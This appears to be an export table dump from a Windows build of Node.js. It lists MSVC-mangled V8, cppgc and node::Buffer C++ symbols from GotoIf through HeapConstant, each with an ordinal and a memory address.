                                                                                                                                                                                                        ?GotoIf@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UIntegralT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@@Z78760x140f22b90
                                                                                                                                                                                                        ?GotoIfBasicBlock@GraphAssembler@compiler@internal@v8@@IEAAXPEAVBasicBlock@234@PEAVNode@234@W4Value@IrOpcode@234@@Z78770x140f5ac10
                                                                                                                                                                                                        ?GotoIfNot@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UIntegralT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@@Z78780x140f22c90
                                                                                                                                                                                                        ?Granularity@ObjectStartBitmap@internal@cppgc@@SA_KXZ78790x1400b9f30
                                                                                                                                                                                                        ?GreaterThan@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z78800x140f3cbb0
                                                                                                                                                                                                        ?GreaterThanOrEqual@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z78810x140f3cc70
                                                                                                                                                                                                        ?Grow@?$SmallOrderedHashTable@VSmallOrderedHashMap@internal@v8@@@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashMap@internal@v8@@@23@@Z78820x1407e5470
                                                                                                                                                                                                        ?Grow@?$SmallOrderedHashTable@VSmallOrderedHashSet@internal@v8@@@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashSet@internal@v8@@@23@@Z78830x1407e54e0
                                                                                                                                                                                                        ?Grow@NewSpace@internal@v8@@QEAAXXZ78840x14096f7d0
                                                                                                                                                                                                        ?Grow@ValueNumberingReducer@compiler@internal@v8@@AEAAXXZ78850x141084a00
                                                                                                                                                                                                        ?Grow@WasmMemoryObject@internal@v8@@SAHPEAVIsolate@23@V?$Handle@VWasmMemoryObject@internal@v8@@@23@I@Z78860x140531520
                                                                                                                                                                                                        ?Grow@WasmTableObject@internal@v8@@SAHPEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@IV?$Handle@VObject@internal@v8@@@23@@Z78870x140531c50
                                                                                                                                                                                                        ?GrowBuffer@Assembler@internal@v8@@AEAAXXZ78880x14050caa0
                                                                                                                                                                                                        ?GrowInPlace@BackingStore@internal@v8@@QEAA?AW4ResizeOrGrowResult@123@PEAVIsolate@23@_K1@Z78890x1408c9880
                                                                                                                                                                                                        ?GrowOSRCache@OSROptimizedCodeCache@internal@v8@@CAHV?$Handle@VNativeContext@internal@v8@@@23@PEAV?$Handle@VOSROptimizedCodeCache@internal@v8@@@23@@Z78900x1407dfea0
                                                                                                                                                                                                        ?GrowRegisterMap@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXVRegister@234@@Z78910x1408f8440
                                                                                                                                                                                                        ?GrowTable@ExternalPointerTable@internal@v8@@SAXPEAV123@@Z78920x140a25e30
                                                                                                                                                                                                        ?GrowWasmMemoryInPlace@BackingStore@internal@v8@@QEAA?AV?$Optional@_K@base@3@PEAVIsolate@23@_K1@Z78930x1408c9910
                                                                                                                                                                                                        ?GrowingFactor@?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@SANPEAVHeap@23@_KNN@Z78940x1409c6aa0
                                                                                                                                                                                                        ?GrowingFactor@?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@SANPEAVHeap@23@_KNN@Z78950x1409c6b90
                                                                                                                                                                                                        ?GuaranteedAllocatable@FreeListMany@internal@v8@@UEAA_K_K@Z78960x1409cd400
                                                                                                                                                                                                        ?HandleDebugBreak@Debug@internal@v8@@QEAAXW4IgnoreBreakMode@23@@Z78970x140a61620
                                                                                                                                                                                                        ?HandleException@CodeAssembler@compiler@internal@v8@@AEAAXPEAVNode@234@@Z78980x140f22d90
                                                                                                                                                                                                        ?HandleInterrupts@StackGuard@internal@v8@@QEAA?AVObject@23@XZ78990x140a009f0
                                                                                                                                                                                                        ?HandleMovableReference@MarkingVisitorBase@internal@cppgc@@MEAAXPEAPEBX@Z79000x14045a280
                                                                                                                                                                                                        ?HandleMovableReference@UnifiedHeapMarkingVisitorBase@internal@v8@@MEAAXPEAPEBX@Z79010x14045a280
                                                                                                                                                                                                        ?HandleMovableReference@Visitor@cppgc@@MEAAXPEAPEBX@Z79020x140078990
                                                                                                                                                                                                        ?HandlerIndexForEntry@FeedbackIterator@internal@v8@@SAHH@Z79030x140485210
                                                                                                                                                                                                        ?HandlerTableRangePrint@HandlerTable@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z79040x140a9f660
                                                                                                                                                                                                        ?HandlerTableReturnPrint@HandlerTable@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z79050x140a9fed0
                                                                                                                                                                                                        ?Has@Map@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z79060x140b1ac30
                                                                                                                                                                                                        ?Has@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@I@Z79070x140b1ae30
                                                                                                                                                                                                        ?Has@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z79080x140b1b000
                                                                                                                                                                                                        ?Has@ObjectHashSet@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z79090x140485240
                                                                                                                                                                                                        ?Has@ObjectHashSet@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@H@Z79100x140485340
                                                                                                                                                                                                        ?Has@Set@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z79110x140b1b290
                                                                                                                                                                                                        ?Has@StringSet@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@@Z79120x1407facd0
                                                                                                                                                                                                        ?HasAccess@LookupIterator@internal@v8@@QEBA_NXZ79130x14081ca10
                                                                                                                                                                                                        ?HasActiveBlock@GraphAssembler@compiler@internal@v8@@QEBA_NXZ79140x1404bd180
                                                                                                                                                                                                        ?HasAsyncEventDelegate@Isolate@internal@v8@@AEBA_NXZ79150x1404853f0
                                                                                                                                                                                                        ?HasAttachedOptimizedCode@JSFunction@internal@v8@@QEBA_NXZ79160x1408550f0
                                                                                                                                                                                                        ?HasBeenApplied@BookmarkScope@Scanner@internal@v8@@QEBA_NXZ79170x140764ee0
                                                                                                                                                                                                        ?HasBeenSet@BookmarkScope@Scanner@internal@v8@@QEBA_NXZ79180x140764ef0
                                                                                                                                                                                                        ?HasBlockCoverage@FunctionData@Coverage@debug@v8@@QEBA_NXZ79190x140a70ed0
                                                                                                                                                                                                        ?HasBreakInfo@SharedFunctionInfo@internal@v8@@QEBA_NXZ79200x1407d8230
                                                                                                                                                                                                        ?HasBreakInfo@SharedFunctionInfoRef@compiler@internal@v8@@QEBA_NXZ79210x140e8aa80
                                                                                                                                                                                                        ?HasBuffer@ArrayBufferView@v8@@QEBA_NXZ79220x140b1b490
                                                                                                                                                                                                        ?HasBuiltinId@SharedFunctionInfoRef@compiler@internal@v8@@QEBA_NXZ79230x140e8aab0
                                                                                                                                                                                                        ?HasBytecodeArray@SharedFunctionInfoRef@compiler@internal@v8@@QEBA_NXZ79240x140e8aad0
                                                                                                                                                                                                        ?HasCallDescriptorFlag@Instruction@compiler@internal@v8@@QEBA_NW4Flag@CallDescriptor@234@@Z79250x1404bc4a0
                                                                                                                                                                                                        ?HasCaught@TryCatch@v8@@QEBA_NXZ79260x140b1b4c0
                                                                                                                                                                                                        ?HasCheckedSyntax@Parser@internal@v8@@AEAA_NXZ79270x1407754b0
                                                                                                                                                                                                        ?HasClientIsolates@Isolate@internal@v8@@QEBA_NXZ79280x140485400
                                                                                                                                                                                                        ?HasCode@NativeModule@wasm@internal@v8@@QEBA_NI@Z79290x14056c250
                                                                                                                                                                                                        ?HasCodeWithTier@NativeModule@wasm@internal@v8@@QEBA_NIW4ExecutionTier@234@@Z79300x14056c2b0
                                                                                                                                                                                                        ?HasContextExtension@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_K@Z79310x140f3cd30
                                                                                                                                                                                                        ?HasContextExtensionSlot@Scope@internal@v8@@QEBA_NXZ79320x1406eb840
                                                                                                                                                                                                        ?HasContextInput@OperatorProperties@compiler@internal@v8@@SA_NPEBVOperator@234@@Z79330x140ea3770
                                                                                                                                                                                                        ?HasContextParameter@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SA_NXZ79340x140078bb0
                                                                                                                                                                                                        ?HasContextParameter@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SA_NXZ79350x140078bb0
                                                                                                                                                                                                        ?HasContextParameter@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SA_NXZ79360x14007a0b0
                                                                                                                                                                                                        ?HasContextParameter@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SA_NXZ79370x14007a0b0
                                                                                                                                                                                                        ?HasContextParameter@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SA_NXZ79380x140078bb0
                                                                                                                                                                                                        ?HasContextParameter@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SA_NXZ79390x140078bb0
                                                                                                                                                                                                        ?HasContextParameter@CallInterfaceDescriptor@internal@v8@@QEBA_NXZ79400x1404bc4b0
                                                                                                                                                                                                        ?HasContextPromiseHooks@Isolate@internal@v8@@QEBA_NXZ79410x140485410
                                                                                                                                                                                                        ?HasCurrent@CodeCommentsIterator@internal@v8@@QEBA_NXZ79420x140ab3720
                                                                                                                                                                                                        ?HasData@BasicBlockProfiler@internal@v8@@QEAA_NPEAVIsolate@23@@Z79430x140a46c00
                                                                                                                                                                                                        ?HasData@PreparseDataBuilder@internal@v8@@QEBA_NXZ79440x1407a0920
                                                                                                                                                                                                        ?HasDataForParent@PreparseDataBuilder@internal@v8@@QEBA_NXZ79450x1407a0940
                                                                                                                                                                                                        ?HasDebugInfo@NativeModule@wasm@internal@v8@@QEBA_NXZ79460x14056c340
                                                                                                                                                                                                        ?HasEmbedderRecorder@Recorder@metrics@internal@v8@@QEBA_NXZ79470x1404c3af0
                                                                                                                                                                                                        ?HasExternalBytes@NativeContextStats@internal@v8@@AEAA_NVMap@23@@Z79480x140991eb0
                                                                                                                                                                                                        ?HasFPVirtualRegisters@InstructionSequence@compiler@internal@v8@@QEBA_NXZ79490x1404bc4c0
                                                                                                                                                                                                        ?HasFeedback@JSHeapBroker@compiler@internal@v8@@QEBA_NAEBUFeedbackSource@234@@Z79500x140f2f7b0
                                                                                                                                                                                                        ?HasFrameStateInput@OperatorProperties@compiler@internal@v8@@SA_NPEBVOperator@234@@Z79510x140ea3790
                                                                                                                                                                                                        ?HasFunctionName@ScopeInfo@internal@v8@@QEBA_NXZ79520x1407dc640
                                                                                                                                                                                                        ?HasGeneralSpillRange@TopLevelLiveRange@compiler@internal@v8@@QEBA_NXZ79530x140f13890
                                                                                                                                                                                                        ?HasHandler@Promise@v8@@QEAA_NXZ79540x140b1b4e0
                                                                                                                                                                                                        ?HasHint@UsePosition@compiler@internal@v8@@QEBA_NXZ79550x140f86b30
                                                                                                                                                                                                        ?HasInPrototypeChain@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ79560x140f3cdd0
                                                                                                                                                                                                        ?HasIndexedLookupInterceptor@Object@v8@@QEAA_NXZ79570x140b1b580
                                                                                                                                                                                                        ?HasInferredFunctionName@ScopeInfo@internal@v8@@QEBA_NXZ79580x1407dc660
                                                                                                                                                                                                        ?HasInnerFunctions@PreparseDataBuilder@internal@v8@@QEBA_NXZ79590x1407a0960
                                                                                                                                                                                                        ?HasInstance@Buffer@node@@YA_NV?$Local@VObject@v8@@@v8@@@Z79600x140211010
                                                                                                                                                                                                        ?HasInstance@Buffer@node@@YA_NV?$Local@VValue@v8@@@v8@@@Z79610x140211010
                                                                                                                                                                                                        ?HasInstance@FunctionTemplate@v8@@QEAA_NV?$Local@VValue@v8@@@2@@Z79620x140b1b5b0
                                                                                                                                                                                                        ?HasIntegrityLevelTransitionTo@TransitionsAccessor@internal@v8@@QEAA_NVMap@23@PEAVSymbol@23@PEAW4PropertyAttributes@23@@Z79630x1407bc970
                                                                                                                                                                                                        ?HasIsolatePromiseHooks@Isolate@internal@v8@@AEBA_NXZ79640x140485420
                                                                                                                                                                                                        ?HasJobs@OptimizingCompileDispatcher@internal@v8@@QEAA_NXZ79650x140a7ada0
                                                                                                                                                                                                        ?HasKey@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA_NPEAVIsolate@23@VOrderedHashMap@23@VObject@23@@Z79660x1407e5550
                                                                                                                                                                                                        ?HasKey@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA_NPEAVIsolate@23@VOrderedHashSet@23@VObject@23@@Z79670x1407e5580
                                                                                                                                                                                                        ?HasKey@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@SA_NPEAVIsolate@23@VOrderedNameDictionary@23@VObject@23@@Z79680x1407e55b0
                                                                                                                                                                                                        ?HasKey@?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z79690x1407e5650
                                                                                                                                                                                                        ?HasKey@?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z79700x1407e56b0
                                                                                                                                                                                                        ?HasKey@?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z79710x1407e5710
                                                                                                                                                                                                        ?HasKey@?$SmallOrderedHashTable@VSmallOrderedHashMap@internal@v8@@@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z79720x1407e57b0
                                                                                                                                                                                                        ?HasKey@?$SmallOrderedHashTable@VSmallOrderedHashSet@internal@v8@@@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z79730x1407e57d0
                                                                                                                                                                                                        ?HasKey@SmallOrderedHashMap@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z79740x1407e57b0
                                                                                                                                                                                                        ?HasKey@SmallOrderedHashSet@internal@v8@@QEAA_NPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z79750x1407e57d0
                                                                                                                                                                                                        ?HasLazyCommits@OS@base@v8@@SA_NXZ79760x14007a0b0
                                                                                                                                                                                                        ?HasLineTerminatorAfterNext@Scanner@internal@v8@@QEAA_NXZ79770x140485430
                                                                                                                                                                                                        ?HasLineTerminatorBeforeNext@Scanner@internal@v8@@QEBA_NXZ79780x140485450
                                                                                                                                                                                                        ?HasLocalsBlockList@ScopeInfo@internal@v8@@QEBA_NXZ79790x1407dc680
                                                                                                                                                                                                        ?HasMarkedExits@LoopFinder@compiler@internal@v8@@SA_NPEAVLoopTree@234@PEBVLoop@5234@@Z79800x14103a880
                                                                                                                                                                                                        ?HasMemoryProtectionKeySupport@WasmCodeManager@wasm@internal@v8@@QEBA_NXZ79810x14056c380
                                                                                                                                                                                                        ?HasMicrotasksSuppressions@MicrotaskQueue@internal@v8@@QEBA_NXZ79820x140485460
                                                                                                                                                                                                        ?HasNamedCaptures@RegExpParser@internal@v8@@AEAA_NXZ79830x14071e130
                                                                                                                                                                                                        ?HasNamedLookupInterceptor@Object@v8@@QEAA_NXZ79840x140b1b690
                                                                                                                                                                                                        ?HasNext@SpaceIterator@internal@v8@@QEAA_NXZ79850x1409ba8a0
                                                                                                                                                                                                        ?HasNoSpillType@TopLevelLiveRange@compiler@internal@v8@@QEBA_NXZ79860x140f138a0
                                                                                                                                                                                                        ?HasOneBytePrefix@String@internal@v8@@QEAA_NV?$Vector@$$CBD@base@3@@Z79870x1407c4960
                                                                                                                                                                                                        ?HasOnlyStablePrototypesWithFastElements@MapRef@compiler@internal@v8@@QEAA_NPEAV?$ZoneVector@VMapRef@compiler@internal@v8@@@34@@Z79880x140e8ab50
                                                                                                                                                                                                        ?HasOperand@UsePosition@compiler@internal@v8@@QEBA_NXZ79890x1405430f0
                                                                                                                                                                                                        ?HasOptions@CFunctionInfo@v8@@QEBA_NXZ79900x14007a190
                                                                                                                                                                                                        ?HasOutput@Instruction@compiler@internal@v8@@QEBA_NXZ79910x1404bc4d0
                                                                                                                                                                                                        ?HasOwnProperty@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z79920x140839cb0
                                                                                                                                                                                                        ?HasOwnProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@I@Z79930x140b1b6c0
                                                                                                                                                                                                        ?HasOwnProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z79940x140b1b910
                                                                                                                                                                                                        ?HasPages@PagedSpace@internal@v8@@IEAA_NXZ79950x140485470
                                                                                                                                                                                                        ?HasPendingBackgroundTasks@Isolate@v8@@QEAA_NXZ79960x140b1ba90
                                                                                                                                                                                                        ?HasPrepareStackTraceCallback@Isolate@internal@v8@@QEBA_NXZ79970x140a12620
                                                                                                                                                                                                        ?HasPrivate@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VPrivate@v8@@@2@@Z79980x140b1bab0
                                                                                                                                                                                                        ?HasProperty@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z79990x140f3cde0
                                                                                                                                                                                                        ?HasProperty@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@PEAVLookupIterator@23@@Z80000x140839e60
                                                                                                                                                                                                        ?HasProperty@Operator@compiler@internal@v8@@QEBA_NW4Property@1234@@Z80010x1404bc4e0
                                                                                                                                                                                                        ?HasRealIndexedProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@I@Z80020x140b1bad0
                                                                                                                                                                                                        ?HasRealNamedCallbackProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z80030x140b1bc70
                                                                                                                                                                                                        ?HasRealNamedProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z80040x140b1be10
                                                                                                                                                                                                        ?HasReferenceMap@Instruction@compiler@internal@v8@@QEBA_NXZ80050x1404bc4f0
                                                                                                                                                                                                        ?HasRegisterAssigned@LiveRange@compiler@internal@v8@@QEBA_NXZ80060x140f138b0
                                                                                                                                                                                                        ?HasReplacementHigh@Int64Lowering@compiler@internal@v8@@AEAA_NPEAVNode@234@@Z80070x140f688e0
                                                                                                                                                                                                        ?HasReplacementLow@Int64Lowering@compiler@internal@v8@@AEAA_NPEAVNode@234@@Z80080x140f68900
                                                                                                                                                                                                        ?HasRestrictedAllocatableRegisters@CallDescriptor@compiler@internal@v8@@QEBA_NXZ80090x1404bc500
                                                                                                                                                                                                        ?HasRunningCompileJob@WasmEngine@wasm@internal@v8@@QEAA_NPEAVIsolate@34@@Z80100x140557b60
                                                                                                                                                                                                        ?HasSharedFunctionName@ScopeInfo@internal@v8@@QEBA_NXZ80110x1407dc750
                                                                                                                                                                                                        ?HasSimpleParameters@Scope@internal@v8@@QEAA_NXZ80120x140af56f0
                                                                                                                                                                                                        ?HasSimpleTransitionTo@TransitionsAccessor@internal@v8@@AEAA_NVMap@23@@Z80130x1407bca50
                                                                                                                                                                                                        ?HasSource@WasmModuleSourceMap@wasm@internal@v8@@QEBA_N_K0@Z80140x14053c5e0
                                                                                                                                                                                                        ?HasSpillOperand@TopLevelLiveRange@compiler@internal@v8@@QEBA_NXZ80150x140f138d0
                                                                                                                                                                                                        ?HasSpillRange@TopLevelLiveRange@compiler@internal@v8@@QEBA_NXZ80160x140f138e0
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAA_NH@Z80170x1407fb140
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA_NHHHH@Z80180x1407fb190
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA_NH@Z80190x1407fb140
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA_NHHHH@Z80200x1407fb190
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA_NH@Z80210x1407fb140
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA_NHHHH@Z80220x1407fb190
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA_NH@Z80230x1407fb140
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA_NHHHH@Z80240x1407fb190
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA_NH@Z80250x1407fb140
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA_NHHHH@Z80260x1407fb190
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAA_NH@Z80270x1407fb140
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA_NHHHH@Z80280x1407fb190
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA_NH@Z80290x1407fb140
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA_NHHHH@Z80300x1407fb190
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA_NH@Z80310x1407fb140
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA_NHHHH@Z80320x1407fb190
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAA_NH@Z80330x1407fb140
                                                                                                                                                                                                        ?HasSufficientCapacityToAdd@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA_NHHHH@Z80340x1407fb190
                                                                                                                                                                                                        ?HasTerminated@TryCatch@v8@@QEBA_NXZ80350x140b1bfb0
                                                                                                                                                                                                        ?HasTerminationRequest@StackGuard@internal@v8@@QEAA_NXZ80360x140a01540
                                                                                                                                                                                                        ?HasThisReference@Scope@internal@v8@@QEBA_NXZ80370x140af5720
                                                                                                                                                                                                        ?HasThreadLocal@Thread@base@v8@@SA_NH@Z80380x140e5ed40
                                                                                                                                                                                                        ?HasTypeProfileSlot@FeedbackVectorSpec@internal@v8@@QEBA_NXZ80390x14087c030
                                                                                                                                                                                                        ?HasValidEntry@WasmModuleSourceMap@wasm@internal@v8@@QEBA_N_K0@Z80400x14053c600
                                                                                                                                                                                                        ?HasWireBytes@NativeModule@wasm@internal@v8@@QEBA_NXZ80410x140485480
                                                                                                                                                                                                        ?Hash@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEBAHXZ80420x140485530
                                                                                                                                                                                                        ?Hash@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEBAHXZ80430x140485530
                                                                                                                                                                                                        ?Hash@FlagList@internal@v8@@SAIXZ80440x1409fc5b0
                                                                                                                                                                                                        ?Hash@IdentityMapBase@internal@v8@@AEBAI_K@Z80450x1406b4720
                                                                                                                                                                                                        ?Hash@OrderedNameDictionary@internal@v8@@QEAAHXZ80460x140485540
                                                                                                                                                                                                        ?Hash@OrderedNameDictionaryHandler@internal@v8@@SAHVHeapObject@23@@Z80470x1407e5a30
                                                                                                                                                                                                        ?Hash@SharedFunctionInfo@internal@v8@@QEAAIXZ80480x1407d8340
                                                                                                                                                                                                        ?Hash@SwissNameDictionary@internal@v8@@QEAAHXZ80490x140485550
                                                                                                                                                                                                        ?Hash@Version@internal@v8@@SAIXZ80500x1405290e0
                                                                                                                                                                                                        ?HashCode@NodeProperties@compiler@internal@v8@@SA_KPEAVNode@234@@Z80510x140eacf90
                                                                                                                                                                                                        ?HashCode@Operator@compiler@internal@v8@@UEBA_KXZ80520x1404bc510
                                                                                                                                                                                                        ?HashForObject@GlobalDictionaryShape@internal@v8@@SAIVReadOnlyRoots@23@VObject@23@@Z80530x140485560
                                                                                                                                                                                                        ?HashIndex@OrderedNameDictionary@internal@v8@@SAHXZ80540x14007a0a0
                                                                                                                                                                                                        ?HashIsolateForEmbeddedBlob@Isolate@internal@v8@@QEAA_KXZ80550x140a12630
                                                                                                                                                                                                        ?HashTableStartIndex@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SAHXZ80560x140475480
                                                                                                                                                                                                        ?HashTableStartIndex@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SAHXZ80570x140475480
                                                                                                                                                                                                        ?HashTableStartIndex@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@SAHXZ80580x1400792d0
                                                                                                                                                                                                        ?HashTableStartOffset@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SAHXZ80590x1400b9f20
                                                                                                                                                                                                        ?HashTableStartOffset@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SAHXZ80600x1400b9f20
                                                                                                                                                                                                        ?HashTableStartOffset@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@SAHXZ80610x1400b1030
                                                                                                                                                                                                        ?HashToBucket@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@IEAAHH@Z80620x140485570
                                                                                                                                                                                                        ?HashToBucket@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@IEAAHH@Z80630x140485570
                                                                                                                                                                                                        ?HashToBucket@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@IEAAHH@Z80640x140485580
                                                                                                                                                                                                        ?HashToEntryRaw@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@IEAAHH@Z80650x140485590
                                                                                                                                                                                                        ?HashToEntryRaw@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@IEAAHH@Z80660x140485590
                                                                                                                                                                                                        ?HashToEntryRaw@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@IEAAHH@Z80670x1404855c0
                                                                                                                                                                                                        ?Heap@AsmType@wasm@internal@v8@@SAPEAV1234@XZ80680x140475480
                                                                                                                                                                                                        ?HeapConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VHeapObject@internal@v8@@@34@@Z80690x140eb3c20
                                                                                                                                                                                                        ?HeapConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@V?$Handle@VHeapObject@internal@v8@@@34@@Z80700x140f56250
                                                                                                                                                                                                        ?HeapConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VHeapObject@internal@v8@@@34@V?$Handle@VHeapObject@internal@v8@@@34@@Z80710x140f5ad50
                                                                                                                                                                                                        ?HeapConstant@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@V?$Handle@VHeapObject@internal@v8@@@34@@Z80720x140f22fb0
                                                                                                                                                                                                        ?HeapConstant@Type@compiler@internal@v8@@CA?AV1234@AEBVHeapObjectRef@234@PEAVZone@34@@Z80730x140e9fe90
